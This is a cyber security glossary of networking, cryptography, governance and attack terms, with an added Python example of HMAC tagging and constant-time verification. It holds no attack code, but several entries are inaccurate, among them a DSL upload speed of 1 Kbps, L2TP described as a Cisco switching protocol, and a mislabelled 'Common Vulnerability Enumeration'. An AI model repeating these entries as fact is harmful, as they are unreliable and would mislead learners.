Cyber Security Glossary
Acceptable Use Policy (AUP)
A policy that communicates to users what specific uses of computer resources are permitted.
Access Control List (ACL)
A list associated with an object, such as a file, that identifies what level of access each subject, such as a user, has as well as what they can do to the object, for example, read, write, or execute.
Access Point (AP)
A device designed to interconnect wireless network nodes with wired networks.
Active Directory (AD)
The directory service portion of the Windows operating system that stores information about network-based entities, such as applications, files, printers, and people, and provides a structured, consistent way to name, describe, locate, access, and manage these resources.
Address Resolution Protocol (ARP)
A TCP/IP protocol, used with the command line tool of the same name, to determine the MAC address that corresponds to a particular IP address.
Address Space Layout Randomisation (ASLR)
A memory-protection process employed by operating systems where the memory space is block randomised to guard against targeted injections from buffer-overflow attacks.
Advanced Encryption Standard (AES)
An encryption standard created in the late 1990s that uses a symmetric block cipher with a 128-bit block size and a 128-, 192- or 256-bit key size.
Advanced Encryption Standard 256-bit (AES-256)
An implementation of AES using a 256-bit key.
Advanced Persistent Threat (APT)
A threat vector whose main objective is to remain on the system stealthily, with data exfiltration as a secondary task.
Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)
A framework developed by MITRE for describing the methods used by attackers.
Annualised Loss Expectancy (ALE)
How much an event is expected to cost the business per year.
Annualised Rate of Occurrence (ARO)
The frequency with which an event is expected to occur on an annualised basis.
Antivirus (AV)
A software program designed to detect, mitigate, or remove malware and viruses from a system or network.
Application Programming Interface (API)
A defined set of instructions for interfacing with a computer program, so that developers can access the interfaces the program exposes.
Artificial Intelligence (AI)
Artificial Intelligence, or AI for short, can be described most simply as software that imitates human behaviours and capabilities. This is achieved by utilising an AI model that has been trained on a large amount of data.
Authentication Header (AH)
A portion of the IPSec security protocol that provides authentication services and replay-detection ability. It can be used either by itself or with Encapsulating Security Payload (ESP).
Authentication, Authorisation, Accounting (AAA)
A security philosophy where a user trying to connect to a network must first present some form of credential to be authenticated and then must have limitable permissions within the network. The authenticating server should also record session information about the client.
Authentication, Authorisation, Accounting, Auditing (AAAA)
This adds auditing to the AAA security philosophy.
Automated Indicator Sharing (AIS)
The use of STIX and TAXII to share threat information between systems.
Basic Input/Output System (BIOS)
A firmware element of a computer system that provides the interface between hardware and system software with respect to devices and peripherals. BIOS has been replaced by Unified Extensible Firmware Interface (UEFI), a more complex and capable system.
Border Gateway Protocol (BGP)
An exterior gateway routing protocol that enables groups of routers to share routing information so that efficient, loop-free routes can be established. BGP connects Autonomous Systems on the Internet. The current version is BGP-4.
Bourne Again Shell (BASH)
A command language for Linux systems.
Bridge Protocol Data Unit (BPDU)
A type of data message exchanged across switches within an extended LAN that uses a Spanning Tree Protocol topology.
Bring Your Own Device (BYOD)
Mobile deployment model wherein users bring their own network-enabled devices to the work environment. These mobile phones, tablets, notebooks, and other mobile devices must be easily and securely integrated and released from corporate network environments using onboarding and offboarding technologies.
Business Continuity (BC)
The level of readiness of a business to maintain critical functions after an emergency or disruption.
Business Continuity Planning (BCP)
A plan a business develops to continue critical operations in the event of a major disruption.
Business Email Compromise (BEC)
A type of cyber attack where the attacker uses email to trick a victim into performing an action that benefits the attacker, such as transferring money or divulging sensitive information.
Business Impact Analysis (BIA)
An analysis of the impact to the business of a specific event.
Business Partners Agreement (BPA)
A written agreement defining the terms and conditions of a business partnership.
Cardholder Data (CHD)
Any personally identifiable information (PII) associated with a person who holds a credit or debit card.
Centre for Internet Security (CIS)
A US-based non-profit organisation, formed in October 2000. Its mission is to make the connected world a safer place by developing, validating, and promoting timely best practice solutions that help people, businesses, and governments protect themselves against pervasive cyber threats.
Certificate Authority (CA)
An entity responsible for the issuing and revoking of certificates.
Certificate Revocation List (CRL)
A digitally signed object that lists all the current but revoked certificates issued by a given certification authority.
Certificate Signing Request (CSR)
A message sent from an applicant to a certificate authority to apply for a digital identity certificate.
Challenge-Handshake Authentication Protocol (CHAP)
Used to provide authentication across point-to-point links using the Point-to-Point Protocol (PPP).
Channel Service Unit (CSU)
A piece of equipment that connects a T-carrier leased line from the telephone company to a customer’s equipment, such as a router.
Chief Information Officer (CIO)
A company executive responsible for the management, implementation, and usability of information and computer technologies. Also sometimes called Chief Digital Information Officer (CDIO) or Information Technology (IT) Director.
Chief Security Officer (CSO)
The person appointed to oversee security functions in an enterprise.
Chief Technology Officer (CTO)
The person appointed to oversee scientific technology functions in an enterprise.
Choose Your Own Device (CYOD)
A mobile device deployment methodology where each person chooses their own device type.
Cipher Block Chaining (CBC)
A method of adding randomisation to blocks, where each block of plaintext is XORed with the previous ciphertext block before being encrypted.
Cipher Feedback (CFB)
A method to make a block cipher into a self-synchronising stream cipher.
Ciphertext
Ciphertext is the result of plaintext being encrypted using an algorithm, known as a cipher.
Closed-Circuit Television (CCTV)
A private television system usually hardwired into security applications to record visual information.
Cloud Access Security Broker (CASB)
A security policy enforcement mechanism between cloud users and providers.
Cloud Security Alliance (CSA)
A US-based not-for-profit organisation with a mission to ‘promote the use of best practices for providing security assurance within cloud computing, and to provide education on the uses of cloud computing to help secure all other forms of computing’.
Cloud Service Provider (CSP)
An organisation that offers cloud-based network services, infrastructure, or business applications.
Command and Control (C2)
Servers used by hackers to control malware that has been launched against targets. Multiple machines are often infected with malware and then these machines are used for some malicious purpose, such as stealing sensitive data or launching a distributed denial of service attack.
Common Vulnerabilities and Exposures (CVE [1])
A database hosted by the MITRE corporation, which incorporates a list of known vulnerabilities in publicly released software.
Common Vulnerability Enumeration (CVE [2])
A specification that provides a common language of discourse for discussing, finding, and dealing with the causes of software security vulnerabilities as they are found in code, design, or system architecture.
Common Vulnerability Scoring System (CVSS)
A framework for scoring the severity of a vulnerability.
Common Weakness Enumeration (CWE)
A specification developed and maintained by MITRE to identify the root cause, or weaknesses, of security vulnerabilities.
Common Weakness Scoring System (CWSS)
A specification developed and maintained by MITRE to provide a way to prioritise software weaknesses that can introduce security vulnerabilities.
Completely Automated Public Turing Test to Tell Computers and Humans Apart (CAPTCHA)
Software designed to pose tests that require human ability to resolve, preventing robots from filling in and submitting web pages.
Computer Emergency Response Team (CERT)
A group responsible for investigating and responding to security breaches, viruses, and other potential catastrophic incidents. Also known as a Computer Incident Response Team (CIRT).
Computer Incident Response Team (CIRT)
A group responsible for investigating and responding to security breaches, viruses, and other potential catastrophic incidents. Also known as a Computer Emergency Response Team (CERT).
Computer Security Incident Response Team (CSIRT)
An expert group that handles computer security incidents. Alternative names for such groups include Computer Emergency Readiness Team and Computer Security Incident Response Team. A more modern representation of the CSIRT acronym is Cyber Security Incident Response Team.
Confidentiality, Integrity, and Availability (CIA)
The CIA triad is widely considered to be the foundation of IT security. It is put into practice through various security methods and controls. Every security technique, practice, and mechanism put into place to protect systems and data relates in some fashion to ensuring confidentiality, integrity, and availability.
Content Management System (CMS)
A web-based application that allows non-technical users to manage the content of a website. These applications are built using web technologies such as PHP or the .NET Framework and use a database, for example MySQL, PostgreSQL, Oracle or SQL Server, to store the website's content.
Contingency Planning (CP)
The act of creating processes and procedures that are used under special conditions.
Continuity of Operations Planning (COOP)
The creation of plans related to continuing essential business operations after any major disruption.
Corporate Owned, Personally Enabled (COPE)
A form of mobile device ownership, or management, where a company provides employees with a mobile device and allows them to use it as if they owned it.
Corrective Action Report (CAR)
A report used to document the corrective actions taken on a system.
Counter-Mode (CTM)
Turns a block cipher into a stream cipher.
Counter-Mode/CBC-MAC Protocol (CCMP)
Also known as Counter Mode with Cipher Block Chaining-Message Authentication Code Protocol. An enhanced data cryptographic encapsulation mechanism based on the Counter Mode with CBC-MAC for AES, designed for use with wireless LANs.
Cross-Site Request Forgery (CSRF or XSRF)
A method of attacking a system by sending malicious input to the system and relying on the parsers and execution elements to perform the requested actions, thus instantiating the attack. CSRF exploits the trust a site has in the user’s browser.
Cross-site Scripting (XSS)
A method of attacking a system by sending script commands to the system input and relying on the parsers and execution elements to perform the requested scripted actions, thus instantiating the attack. XSS exploits the trust a user has for the site.
Cyclic Redundancy Check (CRC)
An error detection technique that uses a series of two 8-bit block check characters to represent an entire block of data. These block check characters are incorporated into the transmission frame and then checked at the receiving end.
Darknet
An area of the internet that cannot be indexed by search engines such as Google and is not normally accessible via a standard web browser, but instead through specialist software. A darknet can be used for harmless purposes, such as hosting a corporate website, as well as illegal ones, such as hacking and file-sharing forums where users wish to stay anonymous.
Data Encryption Standard (DES)
A private key encryption algorithm adopted by the U.S. government as a standard for the protection of sensitive but unclassified information. Commonly used in 3DES, where three rounds are applied to provide greater security.
Data Execution Prevention (DEP)
A security feature of an operating system that can be driven by software, hardware, or both, designed to prevent the execution of code from blocks of data in memory.
Data Loss Prevention (DLP)
Technology, processes, and procedures designed to detect when unauthorised removal of data from a system occurs. DLP is typically active, preventing the loss either by blocking the transfer or dropping the connection.
Data Privacy Officer (DPO)
The person in charge of privacy/data protection in the EU under GDPR.
Database Administrator (DBA)
A person who is responsible for directing and performing all activities related to maintaining a successful database environment. A DBA makes sure an organisation's databases and related applications operate functionally and efficiently.
Denial-of-Service (DoS)
An attack that floods a networked resource with so many requests that it becomes overwhelmed and ceases functioning. DoS prevents users from gaining normal use of a resource.
Desktop as a Service (DaaS)
A cloud computing service that enables a user or organisation to virtualise user workstations and manage them as flexibly as other cloud resources.
Destination Network Address Translation (DNAT)
A one-to-one static translation from a public destination address to a private address.
Diffie-Hellman Ephemeral (DHE)
A cryptographic method of establishing a shared key over an insecure medium in a secure fashion using a temporary key to enable perfect forward secrecy.
Digital Rights Management (DRM)
Access controls for restricting the use of proprietary hardware and copyrighted works.
Digital Signature Algorithm (DSA)
A U.S. government standard for implementing digital signatures.
Digital Subscriber Line (DSL)
A high-speed Internet connection technology that uses a regular telephone line for connectivity. DSL comes in several varieties, including asymmetric (ADSL) and symmetric (SDSL), and many speeds. Typical home-user DSL connections are ADSL with a download speed of up to 9 Mbps and an upload speed of up to 1 Kbps.
Disaster Recovery (DR)
An organisation’s ability to regain access and functionality to its IT infrastructure after a natural or human disaster.
Disaster Recovery Plan (DRP)
A written plan developed to address how an organisation will react to a natural or manmade disaster in order to ensure business continuity. Related to the concept of a Business Continuity Plan (BCP).
Discretionary Access Control (DAC)
An access control mechanism in which the owner of an object (such as a file) can decide which other subjects (such as other users) may have access to the object as well as what access (read, write, execute) these subjects can have.
Distributed Denial of Service (DDoS)
A multicomputer assault on a network resource that attempts, with sheer overwhelming quantity of requests, to prevent regular users from receiving services from the resource. Can also be used to crash systems. DDoS attacks are usually executed using botnets consisting of compromised systems referred to as zombies.
Domain Keys Identified Mail (DKIM)
An email authentication method designed to detect forged sender addresses in email, a technique often used in phishing and email spam. DKIM allows the receiver to check that an email claiming to have come from a specific domain was indeed authorised by the owner of that domain.
Domain Name System (DNS)
A TCP/IP name resolution system that resolves hostnames to IP addresses, IP addresses to hostnames, and other bindings, such as the DNS servers and mail servers for a domain.
Domain-based Message Authentication Reporting and Conformance (DMARC)
An e-mail authentication, policy, and reporting protocol.
Drive-by Download
A drive-by download is where something is downloaded from the internet to a computer without the prior knowledge of the user, or where a download is authorised by the user but the full consequences of the download are not understood.
Dynamic Host Configuration Protocol (DHCP)
An Internet Engineering Task Force (IETF) Internet Protocol (IP) specification for automatically allocating IP addresses and other configuration information based on network adapter address.
Dynamic Link Library (DLL)
A type of file that contains a library of functions and other information that can be accessed by Microsoft Windows-based software.
Electronic Code Book (ECB)
A block cipher mode where the message is divided into blocks, and each block is encrypted separately.
Electronic Serial Number (ESN)
A unique identification number embedded by manufacturers on a microchip in wireless phones.
Elliptic Curve Cryptography (ECC)
A method of public key cryptography based on the algebraic structure of elliptic curves over finite fields.
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE)
A cryptographic method using ECC to establish a shared key over an insecure medium in a secure fashion using a temporary key to enable perfect forward secrecy.
Elliptic Curve Digital Signature Algorithm (ECDSA)
A cryptographic method using ECC to create a digital signature.
Encapsulated Security Payload (ESP)
A portion of the IPSec implementation that provides for data confidentiality with optional authentication and replay-detection services. ESP completely encapsulates user data in the datagram and can be used either by itself or in conjunction with Authentication Headers for varying degrees of IPSec services.
Encrypted File System (EFS)
A feature of Microsoft Windows, introduced in version 3.0 of NTFS, that provides filesystem-level encryption. This technology enables files to be transparently encrypted to protect confidential data from attackers with physical access to the computer. It is available on all versions of Windows from Windows 2000 onwards, except the Home edition. By default, no files are encrypted, but users can enable encryption on a per-file, per-directory or per-drive basis.
Encryption
The process of converting plain text into ciphertext to prevent unauthorised access.
End of Life (EOL)
A term used to denote that something has reached the end of its useful life.
End of Service (EOS [1])
A term used to denote when the manufacturer stops selling an item. In most cases, the manufacturer no longer provides maintenance services or updates.
End of Support (EOS [2])
A point in time where a manufacturer stops providing technical support and updates for a product. The product may still function after this time.
End-User License Agreement (EULA)
An agreement that comes with a piece of software, which a user must accept before using it. The agreement outlines the terms of use for the software, together with a list of any actions that violate the agreement.
Endpoint Detection and Response (EDR)
A cybersecurity technology that continually monitors an endpoint to mitigate malicious cyber threats. Also known as endpoint threat detection and response.
Enterprise Resource Planning (ERP)
The integrated management of main business processes, often in real time and mediated by software and technology.
Exclusive OR (XOR)
An operation commonly used in cryptography.
Extended Detection Response (XDR)
Collects, correlates, and contextualises alerts from different solutions across endpoints, servers, networks, applications, and cloud workloads, into a unified incident detection and response platform.
Extensible Authentication Protocol (EAP)
Authentication wrapper that EAP-compliant applications can use to accept one of many types of authentication. While EAP is a general-purpose authentication wrapper, its only substantial use is in wireless networks.
Extensible Markup Language (XML)
A text-based, human-readable data markup language.
Facial Recognition Technology (FRT)
Technology that analyses facial features, either from images or video, and compares them to a database of known faces to identify individuals. Distinct points on a face are mapped and assigned a mathematical representation, which is then compared with other mathematical representations assigned to faces in the database.
False Rejection Rate (FRR)
The acceptable level of legitimate users rejected by the system.
Field Programmable Gate Array (FPGA)
A programmable logic circuit instantiation in hardware.
File Integrity Monitoring (FIM)
An internal control or process that performs the act of validating the integrity of operating system and application software files using a verification method between the current file state and a known, good baseline.
File System Access Control List (FACL)
The implementation of access controls as part of a file system.
File Transfer Protocol (FTP)
A protocol that works at the application layer, which is used to transfer files over a network connection. FTP utilises TCP ports 20 and 21.
File Transfer Protocol Secure (FTPS)
A protocol that works at the application layer, which is used to transfer files over a network connection, using FTP over an SSL or TLS connection.
Firewall
A network security system, which monitors traffic to and from a computer network. It has the ability to allow or block traffic depending on a set of predefined rules. Firewalls can be implemented using software, hardware or a combination of the two.
Full Disk Encryption (FDE)
The application of encryption to an entire disk, protecting all the contents in one container.
Galois Counter Mode (GCM)
A mode of operation for symmetric key cryptographic block ciphers that has been widely adopted because it can be parallelised to increase efficiency and performance.
General Data Protection Regulations (GDPR)
European Union law that specifies a broad set of rights and protections for personal information of EU citizens.
Generic Routing Encapsulation (GRE)
A tunnelling protocol developed by Cisco Systems that can encapsulate a wide variety of network layer protocols inside virtual point-to-point links or point-to-multipoint links over an Internet Protocol network.
Global Positioning System (GPS)
A satellite-based form of location services and time standardisation.
GNU Privacy Guard (GPG)
An application program that follows the OpenPGP standard for encryption.
Graphics Processing Unit (GPU)
A chip designed to manage graphics functions in a system.
Group Policy Object (GPO)
A method used by Windows for the application of OS settings enterprise-wide.
Hard Disk Drive (HDD)
A mechanical device used for the storing of digital data in magnetic form.
Hardware Security Module (HSM)
A physical device used to protect but still allow the use of cryptographic keys. It is separate from the host machine.
Hashed Message Authentication Code (HMAC)
The use of a cryptographic hash function and a message authentication code to ensure the integrity and authenticity of a message.
Heating, Ventilation, and Air Conditioning (HVAC)
All the equipment involved in heating and cooling the environment within a facility. This includes boilers, furnaces, air conditioning units and ducts, plenums, and air passages.
High Availability (HA)
A collection of technologies and procedures that work together to keep an application available at all times.
HMAC-based One-time Password (HOTP)
A method of producing one-time passwords using HMAC functions.
Honeypot
A computer system or portion of a network that has been set up purely for the purposes of attracting intruders. As there are no legitimate users in a system such as this, unauthorised activity is easy to spot.
Host-based Intrusion Detection System (HIDS)
A system that looks for computer intrusions by monitoring activity on one or more individual PCs or servers.
Host-based Intrusion Prevention System (HIPS)
A system that automatically responds to computer intrusions by monitoring activity on one or more individual PCs or servers and responding based on a rule set.
Hypertext Markup Language (HTML)
A language that is used to provide the structure of web pages, using tags to define different parts of the page structure, for example, <h1> tags to denote the largest headings, or <p> tags for paragraphs of text.
Hypertext Transfer Protocol (HTTP)
A network protocol that facilitates the transfer of documents, such as web pages, on the web, typically between a web browser and a server.
Hypertext Transfer Protocol Secure (HTTPS)
A secure version of HTTP in which hypertext is encrypted by Transport Layer Security (TLS) before being sent over the network. Prior to TLS, this was accomplished using Secure Sockets Layer (SSL).
Identity and Access Management (IAM)
The policies and procedures used to manage access control.
Identity Provider (IdP)
A system that creates, maintains, and manages identity information, including authentication services.
Incident Response (IR)
The process of responding to, containing, analysing, and recovering from a computer-related incident.
Incident Response Plan (IRP)
The plan used in responding to, containing, analysing, and recovering from a computer related incident.
Indicators of Compromise (IoC)
A set of values that, if found in memory or file storage, indicate a specific compromise event.
Industrial Control System (ICS)
System that monitors and controls machines such as those in a factory or chemical plant, or even just a large HVAC system in an office building.
Information Systems Security Officer (ISSO)
An individual with assigned responsibility for maintaining the appropriate operational security posture for an information system or program.
Infrastructure as a Service (IaaS)
Cloud Service model that provides on-demand access to infrastructure such as servers, switches, and routers at rates based on resource use. Large-scale, global IaaS providers use virtualisation to minimise idle hardware, protect against data loss and downtime, and respond to spikes in demand.
Infrastructure as Code (IaC)
The use of machine-readable definition files as well as code to manage and provision computer systems.
Initialisation Vector (IV)
A data value used to seed a cryptographic algorithm, providing for a measure of randomness.
Instant Messaging (IM)
A text-based method of communicating over the Internet.
Institute of Electrical and Electronic Engineers (IEEE)
A non-profit, technical, professional institute associated with computer research, standards, and conferences.
Interconnection Security Agreement (ISA)
An agreement between parties to establish procedures for mutual cooperation and coordination between them with respect to security requirements associated with their joint project.
Intermediate Distribution Frame (IDF)
The room where all the horizontal runs from all the work areas on a given floor in a building come together.
International Data Encryption Algorithm (IDEA)
A symmetric encryption algorithm used in a variety of systems for bulk encryption services.
International Standards Organisation (ISO)
An international standard development organisation composed of representatives from the national standards organisations of member countries.
Internet Control Message Protocol (ICMP)
A TCP/IP protocol used to handle many low-level functions such as error or informational reporting. ICMP messages are usually request and response pairs such as echo requests and responses or router solicitations and responses. There are also unsolicited 'responses' (advertisements) that consist of single packets. ICMP messages are connectionless.
Internet Key Exchange (IKE)
A standard key exchange protocol used on the Internet, which is an implementation of the Diffie-Hellman algorithm.
Internet Message Access Protocol (IMAP)
Protocol for retrieving e-mail from an SMTP server.
Internet of Things (IoT)
The everyday objects that can communicate with each other over the Internet, such as smart home appliances, automobiles, video surveillance systems, and more.
Internet Protocol (IP)
Layer 3 protocol responsible for logical addressing and routing packets across networks, including the Internet. It doesn't guarantee reliable delivery of packets across the network, leaving that task to higher-level protocols.
Internet Protocol Security (IPSec)
A protocol used to secure IP packets during transmission across a network. IPSec offers authentication, integrity, and confidentiality services. It uses Authentication Header (AH) and Encapsulating Security Payload (ESP) to accomplish this.
Internet Protocol version 4 (IPv4)
First version of the Internet Protocol introduced in 1980. IPv4 consists of a protocol, header, and address specification. Its 32-bit addresses are written as four sets of numbers between 0 and 255 separated by a period (often called dotted decimal notation).
Internet Protocol version 6 (IPv6)
Second version of the Internet Protocol developed as the address-space limitations of IPv4 became clear. While standardisation started in the 1990s, the transition from IPv4 to IPv6 is still ongoing. Its 128-bit addresses consist of eight sets of four hexadecimal numbers, with each number between 0000 and ffff, using a colon to separate the numbers.
Internet Relay Chat (IRC)
An application layer protocol that facilitates communication in the form of text across the Internet.
Internet Service Provider (ISP)
An organisation that provides access to the Internet in some form, usually for a fee.
Intrusion Detection System (IDS)
A system that monitors network traffic for suspicious activity and alerts when such activity is discovered.
Intrusion Prevention System (IPS [1])
A network security/threat prevention technology that examines network traffic flows to detect and prevent vulnerability exploits. Vulnerability exploits usually come in the form of malicious inputs to a target application or service that attackers use to interrupt and gain control of an application or machine.
IT Contingency Plan (ITCP)
The plan used to manage contingency operations in an IT environment.
Kerberos
A network authentication protocol developed by MIT to enable multiple brands of servers to authenticate multiple brands of clients.
Key Distribution Centre (KDC)
A component of the Kerberos system for authentication that manages the secure distribution of keys.
Key Encryption Key (KEK)
An encryption key whose function it is to encrypt and decrypt the data encryption key (DEK).
Layer 2 Tunnelling Protocol (L2TP)
A Cisco switching protocol that operates at the data link layer.
Lightweight Directory Access Protocol (LDAP)
An application protocol used to access directory services across a TCP/IP network.
Lightweight Extensible Authentication Protocol (LEAP)
A version of EAP developed by Cisco prior to 802.11i to push 802.1X and WEP adoption.
Local Area Network (LAN)
Network that generally (but not always) belongs to one household or organisation and covers a limited area (anything from two devices in an apartment up to thousands of devices on a multi-building school or business campus).
Machine Learning (ML)
Machine learning, or ML for short, is a subfield of artificial intelligence that enables computers to learn patterns from data and make decisions or predictions without being explicitly programmed.
Mail Exchange (MX)
A DNS record that SMTP servers use to determine where to send mail for a given domain.
Main Distribution Frame (MDF)
The room in a building that stores the demarc, telephone cross-connects, and LAN cross-connects.
Malware
Malware is the collective name given to software that has been developed to disrupt or damage data, software or hardware, as well as gain unauthorised access to computer systems.
Managed Detection and Response (MDR)
A cyber security service provided by a third-party that combines advanced technology with human expertise to monitor an organisation's networks, endpoints, and cloud environments for threats, as well as to respond to any threats that are encountered.
Managed Security Service Provider (MSSP)
A third party that manages the security aspects of a system under some form of service agreement.
Managed Service Provider (MSP)
A third party that manages aspects of a system under some form of service agreement.
Mandatory Access Control (MAC [1])
An authorisation method in which the system grants access to resources based on security labels and clearance levels. Used in organisations with very high security needs.
Master Boot Record (MBR)
The first sector of a disk partitioned in the legacy BIOS style, holding the initial boot code and the partition table. Because that code runs before the operating system loads, it has been a target for bootkits; UEFI with Secure Boot and the GUID Partition Table (GPT) replace it on modern systems.
Master Service Agreement (MSA [2])
A contract between two or more parties that establishes what terms and conditions will govern all current and future activities and responsibilities. It creates a contract framework that provides the foundation for all future actions.
Maximum Transmission Unit (MTU)
A measure of the largest payload that a particular protocol can carry in a single packet in a specific instance.
Mean Time Between Failure (MTBF)
A factor typically applied to a hardware component that represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of that component.
Mean Time to Detect (MTTD)
The average time passed between the onset of an IT incident and its discovery, measured by dividing the sum of incident detection times by the number of incidents.
Mean Time to Failure (MTTF)
The statistically determined time to the next failure.
Mean Time to Repair/Recover (MTTR)
A common measure of how long it takes to repair a given failure. This is the average time and may or may not include the time needed to obtain parts.
Media Access Control (MAC [2])
A protocol used in the data link layer for local network addressing.
Memorandum of Agreement (MOA)
A document executed between two parties that defines some form of agreement.
Memorandum of Understanding (MOU)
A document that defines an agreement between two parties in situations where a legal contract is not appropriate.
Message Authentication Code (MAC [4])
A short tag computed over a message with a secret key and sent alongside it, so that a recipient holding the same key can verify that the message is authentic and unaltered. A common construction is the hash-based MAC (HMAC), which builds the tag from a cryptographic hash function such as SHA-256 keyed with the shared secret; without the key an attacker can neither verify nor forge a valid tag.
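Added example (not part of the original glossary): computing and verifying an HMAC-SHA256 tag with Python's standard library. The key and message are constructed for illustration. The point a practitioner should take from it is the constant-time comparison in verify_mac: a plain == on the tag leaks, through timing, how many leading bytes matched.

```python
import hashlib
import hmac
import os


def make_mac(key: bytes, message: bytes) -> bytes:
    """Return the HMAC-SHA256 tag of `message` under the secret `key`."""
    return hmac.new(key, message, hashlib.sha256).digest()


def verify_mac(key: bytes, message: bytes, tag: bytes) -> bool:
    """Recompute the tag and compare it in constant time.

    hmac.compare_digest takes the same time whether the tags differ in the
    first byte or the last, so an attacker cannot forge a tag byte by byte
    by measuring response times.
    """
    expected = make_mac(key, message)
    return hmac.compare_digest(expected, tag)


def demo() -> tuple:
    """Tag a constructed message, then show that tampering is detected."""
    # Constructed key for illustration; a real key comes from a key store,
    # never from source code.
    key = os.urandom(32)
    message = b'{"transfer_to": "ACC-1234", "amount": 100}'
    tag = make_mac(key, message)

    genuine_ok = verify_mac(key, message, tag)

    # Altering the message without the key leaves the old tag invalid.
    tampered = message.replace(b"100", b"100000")
    tampered_ok = verify_mac(key, tampered, tag)

    # Truncating the tag does not help the attacker either.
    truncated_ok = verify_mac(key, message, tag[:-1])

    return genuine_ok, tampered_ok, truncated_ok


if __name__ == "__main__":
    print(demo())
```

The tag is sent with the message; the key never is. Both sides must use the same hash function and key, and the tag should be verified before any other processing of the message.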
Message Digest 5 (MD5)
A hashing algorithm that produces a 128-bit message digest. Collisions can now be generated at will, so MD5 is unsuitable for digital signatures, certificates or any integrity check that must resist a deliberate attacker, although it still appears in legacy checksums.
Metasploit Framework (MSF)
A modular penetration testing framework, written in Ruby, that contains a suite of tools that can be used to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. It enables the user to write, test, and execute exploit code.
Metropolitan Area Network (MAN)
Multiple computers connected via cabling, radio, leased phone lines, or infrared that are within the same city.
Microsoft Challenge Handshake Authentication Protocol (MSCHAP)
A Microsoft-developed variant of the Challenge Handshake Authentication Protocol (CHAP). Version 2 (MS-CHAPv2) is the form used in PPTP and in PEAP/EAP-MSCHAPv2 wireless authentication.
Mobile Application Management (MAM)
The software and services responsible for provisioning and controlling access to internally developed and commercially available mobile apps used in business settings, on both company-provided and 'bring your own' mobile operating systems as used on smartphones and tablet computers.
Mobile Device Management (MDM)
An application designed to bring enterprise-level functionality onto a mobile device, including security functionality and data segregation.
Monitoring as a Service (MaaS)
The use of a third party to provide security monitoring services.
Multifactor Authentication (MFA)
Authenticating a user with two or more independent factors drawn from different categories: something they know (a password or PIN), something they have (a hardware token or phone), or something they are (a biometric). Two instances of the same category, such as two passwords, do not count as multiple factors.
Multifunction Device (MFD)
A single device that consolidates the functions of multiple document handling devices, such as printing, copying, scanning, and faxing.
Multifunction Printer (MFP)
An office machine which incorporates the functionality of multiple devices in one, so as to have a smaller footprint in a home or small business setting, or to provide centralised document management, distribution, or production in a large-office setting. Also known as an all-in-one device or multifunction device.
Multimedia Message Service (MMS)
A standard way to send multimedia messages to and from mobile phones over a cellular network.
Multiprotocol Label Switching (MPLS)
A routing technique in telecommunications networks that directs data from one node to the next based on labels rather than network addresses. Whereas network addresses identify endpoints the labels identify established paths between endpoints. MPLS can encapsulate packets of various network protocols, hence the multiprotocol component of the name.
Name Server (NS)
DNS servers that hold the actual name and IP DNS records in a kind of database called a zone.
National Institute of Standards & Technology (NIST)
A U.S. government agency responsible for standards and technology.
Near Field Communication (NFC)
A set of standards and protocols for establishing a communication link over very short distances, which are used with mobile devices.
Network Access Control (NAC)
An approach to endpoint security that involves monitoring and remediating end-point security issues before allowing an object to connect to a network.
Network Address Translation (NAT)
A way of converting a system's IP address into another IP address before sending it out to a larger network. A network using NAT provides the systems on the network with private IP addresses. The system running the NAT software has two interfaces, one connected to the network and the other connected to the larger network. The NAT program takes packets from the client systems bound for the larger network and translates their internal private IP address to its own public IP address, enabling many systems to share an IP address.
Network Time Protocol (NTP)
A protocol for the transmission of time synchronisation packets over a network.
Network Time Security (NTS)
A protocol developed to secure communications between clients and time servers of the Network Time Protocol (NTP).
Network-based Intrusion Detection System (NIDS)
A system for examining network traffic to identify suspicious, malicious, or undesirable behaviour.
Network-based Intrusion Prevention System (NIPS)
A system that examines network traffic and automatically responds to computer intrusions.
New Technology File System (NTFS)
A proprietary file system developed by Microsoft, introduced in 1993, that supports a wide variety of file operations on servers, PCs, and media.
New Technology LAN Manager (NTLM)
A legacy Microsoft challenge/response authentication protocol suite that also provides message integrity and confidentiality. It predates Kerberos in Windows domains and does not support current cryptographic methods; NTLMv1 is easily broken and both versions are exposed to relay and pass-the-hash attacks, so it is deprecated and no longer recommended for use.
Next-Generation Firewall (NGFW)
Network protection device that functions at multiple layers of the OSI model to tackle traffic no traditional firewall can filter alone.
Non-Disclosure Agreement (NDA)
A legally binding contract that establishes a confidential relationship. The party or parties signing the agreement agree that sensitive information they may obtain will not be made available to any others. An NDA may also be referred to as a confidentiality agreement.
Object Identifier (OID)
A globally unique, hierarchical dotted-number identifier. The Simple Network Management Protocol (SNMP) uses Management Information Bases (MIBs) to categorise data that can be queried and subsequently analysed, and Object Identifiers uniquely number data items within a MIB. OIDs are also used in X.509 certificates to name algorithms, policies and extensions.
On-The-Go (OTG)
A USB specification that lets a device normally used as a peripheral, such as a smartphone, act as the USB host, so that it can read from and write to USB storage and other devices without a PC.
One-Time Password (or Passcode) (OTP)
A unique, dynamically generated, temporary code, that is used for authentication and is only valid for one login session or transaction.
Online Certificate Status Protocol (OCSP)
A protocol used to request the revocation status of a digital certificate. This is an alternative to certificate revocation lists.
Open Authorization (OAUTH)
An open protocol that allows secure, token-based authorisation on the Internet from web, mobile, and desktop applications via a simple and standard method. It can be used by an external partner site to gain delegated access to protected data without the user having to share their password with it: the user authenticates to the resource owner, which issues the partner a scoped token instead. OAuth is an authorisation protocol, not an authentication protocol; OpenID Connect builds on it to provide authentication.
Open Shortest Path First (OSPF)
An interior gateway routing protocol developed for IP networks based on the shortest path first or link state algorithm.
Open Source
Software that is said to be open source refers to the fact that the original source code used to create it is made freely available to view, modify, enhance and redistribute.
Open Source Security Testing Methodology Manual (OSSTMM)
A peer-reviewed methodology for security testing, maintained by the Institute for Security and Open Methodologies (ISECOM).
Open Vulnerability Assessment Language (OVAL)
An XML-based standard for the communication of security information between tools and services.
Open Vulnerability Assessment Scanner (OpenVAS)
An open-source vulnerability scanner that can detect security issues in all manner of servers and network devices.
Open-source Intelligence (OSINT)
Security information derived from sources available to the public.
Operating System (OS)
The basic software that handles input, output, display, memory management, and all the other highly detailed tasks required to support the user environment and associated applications.
Operational Technology (OT)
The name for an IT system used in an industrial setting to control physical processes.
Over The Air (OTA)
Refers to performing an action wirelessly.
Packet Capture (PCAP)
The capture of network traffic to a file for later analysis, and the binary file format (.pcap, and the newer .pcapng) written by tools such as tcpdump and Wireshark for that purpose.
Pan-Tilt-Zoom (PTZ)
